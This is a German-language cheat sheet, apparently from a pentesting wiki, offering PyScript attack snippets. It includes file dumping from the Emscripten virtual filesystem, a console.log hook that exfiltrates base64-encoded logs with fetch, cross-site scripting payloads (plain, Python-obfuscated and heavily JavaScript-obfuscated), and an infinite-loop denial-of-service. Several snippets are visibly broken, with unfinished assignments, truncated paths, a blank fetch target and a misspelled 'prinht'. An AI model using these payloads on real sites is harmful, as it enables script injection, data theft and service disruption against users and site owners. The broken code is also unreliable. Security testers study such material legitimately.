PyScript Pentesting Guide
PyScript ist ein neues Framework, das entwickelt wurde, um Python in HTML zu integrieren, sodass es zusammen mit HTML verwendet werden kann. In diesem Cheat Sheet finden Sie, wie Sie PyScript für Ihre Penetrationstest-Zwecke verwenden können.
Dumping / Abrufen von Dateien aus dem Emscripten-Virtual-Memory-Dateisystem:
Copy < py-script >
with open('/lib/python3.10/site-packages/_pyodide/', 'r') as fin:
out =
</ py-script >
Copy < py-script >
x = "CyberGuy"
if x == "CyberGuy":
with open('/lib/python3.10/asyncio/') as output:
contents =
print('< script > console .pylog = console .log; console .logs = []; console . log = function (){ console . logs .push ( Array .from (arguments)); console . pylog .apply (console , arguments); fetch ( "" , {method : "POST" , headers : { "Content-Type" : "text/plain;charset=utf-8" } , body : JSON .stringify ({ "content" : btoa ( console .logs)})});}</ script >')
</ py-script >
Cross Site Scripting (Ordinary)
Copy < py - script >
print ( "<img src=x onerror='alert(document.domain)'>" )
</ py - script >
Cross Site Scripting (Python Obfuscated)
Copy < py - script >
sur = "\u0027al" ;fur = "e" ;rt = "rt"
p = "\x22x$$\x22\x29\u0027\x3E"
s = "\x28" ;pic = "\x3Cim" ;pa = "g" ;so = "sr"
e = "c\u003d" ;q = "x"
y = "o" ;m = "ner" ;z = "ror\u003d"
print (pic + pa + " " + so + e + q + " " + y + m + z + sur + fur + rt + s + p)
</ py - script >
Cross Site Scripting (JavaScript-Obfuskation)
Copy < py-script >
prinht("<script>var _0x3675bf=_0x5cf5;function _0x5cf5(_0xced4e9,_0x1ae724){var _0x599cad=_0x599c();return _0x5cf5=function(_0x5cf5d2,_0x6f919d){_0x5cf5d2=_0x5cf5d2-0x94;var _0x14caa7=_0x599cad[_0x5cf5d2];return _0x14caa7;},_0x5cf5(_0xced4e9,_0x1ae724);}(function(_0x5ad362,_0x98a567){var _0x459bc5=_0x5cf5,_0x454121=_0x5ad362();while(!![]){try{var _0x168170=-parseInt(_0x459bc5(0x9e))/0x1*(parseInt(_0x459bc5(0x95))/0x2)+parseInt(_0x459bc5(0x97))/0x3*(-parseInt(_0x459bc5(0x9c))/0x4)+-parseInt(_0x459bc5(0x99))/0x5+-parseInt(_0x459bc5(0x9f))/0x6*(parseInt(_0x459bc5(0x9d))/0x7)+-parseInt(_0x459bc5(0x9b))/0x8*(-parseInt(_0x459bc5(0x9a))/0x9)+-parseInt(_0x459bc5(0x94))/0xa+parseInt(_0x459bc5(0x98))/0xb*(parseInt(_0x459bc5(0x96))/0xc);if(_0x168170===_0x98a567)break;else _0x454121['push'](_0x454121['shift']());}catch(_0x5baa73){_0x454121['push'](_0x454121['shift']());}}}(_0x599c,0x28895),prompt(document[_0x3675bf(0xa0)]));function _0x599c(){var _0x34a15f=['15170376Sgmhnu','589203pPKatg','11BaafMZ','445905MAsUXq','432bhVZQo','14792bfmdlY','4FKyEje','92890jvCozd','36031bizdfX','114QrRNWp','domain','3249220MUVofX','18cpppdr'];_0x599c=function(){return _0x34a15f;};return _0x599c();}</script>")
</ py-script >
DoS-Angriff (Unendliche Schleife)
Copy < py-script >
while True:
print(" ")
</ py-script >